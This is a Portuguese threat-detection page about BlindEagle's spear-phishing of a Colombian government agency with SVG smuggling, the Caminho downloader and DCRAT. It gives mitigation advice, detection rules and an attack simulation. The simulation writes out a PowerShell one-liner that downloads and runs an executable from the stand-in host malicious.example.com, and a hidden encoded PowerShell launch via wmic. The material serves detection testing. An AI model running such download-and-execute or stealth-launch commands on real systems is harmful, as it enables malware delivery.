BlindEagle Alvo Agência Governamental Colombiana com Caminho e DCRAT
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
BlindEagle realizou uma operação de spear-phishing mirando uma agência governamental colombiana, entregando um anexo SVG armado que iniciou uma cadeia de execução de JavaScript para PowerShell. Essa sequência baixou um downloader chamado Caminho, que então buscou o trojan de acesso remoto open-source DCRAT hospedado no Discord. A etapa final utilizou o processo hollowing no MSBuild.exe e aplicou múltiplos métodos de evasão para reduzir a detecção.
Investigação
O Zscaler ThreatLabz analisou o fluxo de infecção e relatou uma abordagem de contrabando de SVG, vários níveis de JavaScript ofuscado, um comando PowerShell acionado por WMI, e a entrega do Caminho através de uma URL hospedada no Discord. A investigação também associou a infraestrutura de suporte a endereços IP suecos e um provedor de DNS dinâmico (ydns.eu).
Mitigação
Aplique controles mais rígidos para anexos de email recebidos – especialmente conteúdo SVG – e aplique desarmamento/inspeção de conteúdo para scripts embutidos. Use políticas de proxy web para restringir o acesso a endpoints de hospedagem de arquivos suspeitos, incluindo URLs de arquivo do Discord usadas para entrega de malware. Monitore padrões incomuns de execução de PowerShell e WMI e imponha políticas de lista de permissão de aplicativos cobrindo o uso do MSBuild.exe.
Resposta
Resposta
Acione alertas para o artefato SVG malicioso, o nome de arquivo JavaScript referenciado, e downloads atingindo a URL do Discord. Procure por traços em memória ou em disco do Caminho e DCRAT, evidências de hollowing de processo do MSBuild.exe, e persistência via mudanças no registro ou tarefas agendadas. Quarentena terminais impactados e bloqueie o domínio C2 identificado.
Fluxo de Ataque
Detecções
Strings Suspeitas de Powershell (via powershell)
Ver
LOLBAS WScript / CScript (via criação de processo)
Ver
Possível Arquivo da Internet Resolvido por Processo Incomum (via consulta_dns)
Ver
Chame Métodos .NET Suspeitos do Powershell (via powershell)
Ver
IOCs (HashMd5) para detectar: BlindEagle Alvos Agência do Governo Colombiano com Caminho e DCRAT
Ver
IOCs (SourceIP) para detectar: BlindEagle Alvos Agência do Governo Colombiano com Caminho e DCRAT
Ver
IOCs (HashSha1) para detectar: BlindEagle Alvos Agência do Governo Colombiano com Caminho e DCRAT
Ver
IOCs (HashSha256) para detectar: BlindEagle Alvos Agência do Governo Colombiano com Caminho e DCRAT
Ver
IOCs (DestinationIP) para detectar: BlindEagle Alvos Agência do Governo Colombiano com Caminho e DCRAT
Ver
Detecção do Comando PowerShell do BlindEagle Aproveitando o WMI [Windows Powershell]
Ver
Execução da Simulação
Pré-requisito: O Cheque de Pré-voo de Telemetria & Baseline deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visar gerar exatamente a telemetria esperada pela lógica de detecção.
-
Narrativa de Ataque & Comandos:
O ator de ameaça (BlindEagle) usa WMI para gerar um processo PowerShell que baixa o payload “Caminho” de um servidor C2 remoto e o executa em memória. Ao aproveitarwmic.execom oprocess call createmétodo, o atacante pode executar o PowerShell sem interagir com uma sessão de usuário, tornando a atividade furtiva. A linha de comando contém a palavra literal “powershell”, que satisfaz a condição da regra de detecção.-
Etapa 1 – Prepare o PowerShell malicioso em uma linha:
$url = "http://malicious.example.com/caminho.exe" $out = "$env:TEMPcaminho.exe" Invoke-WebRequest -Uri $url -OutFile $out; PowerShell -ExecutionPolicy Bypass -File $out -
Etapa 2 – Execute via WMI:
$psCmd = 'powershell -nop -w hidden -enc <base64-encoded-payload>' wmic process call create "$psCmd"
A presença de
powershellnoCommandLinecampo do Evento Sysmon 1 gerado peloprocesso filho wmicirá acionar a regra. -
-
Script de Teste de Regressão:
# Simulação de PowerShell do BlindEagle via WMI # ---------------------------------------------------------------------- # 1. Definir payload malicioso (para teste usamos um comando de eco benigno) $payload = 'Write-Host "Execução simulada do Caminho"' $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload)) # 2. Construir a linha de comando do PowerShell que inclui a palavra literal "powershell" $psCommand = "powershell -NoProfile -EncodedCommand $encoded" # 3. Inicie o comando via WMI (wmic) para gerar um Sysmon EventID 1 $wmicCommand = "wmic process call create `"$psCommand`"" Write-Host "Executando via WMI: $wmicCommand" Invoke-Expression $wmicCommand # 4. Opcional: Registrar no console para verificação Write-Host "Simulação completa. Verifique a detecção no SIEM." -
Comandos de Limpeza:
# Remova quaisquer arquivos temporários (nenhum criado nesta simulação) # Mate quaisquer processos wmic ou PowerShell remanescentes iniciados para o teste Get-Process -Name wmic, powershell -ErrorAction SilentlyContinue | Stop-Process -Force Write-Host "Limpeza completa."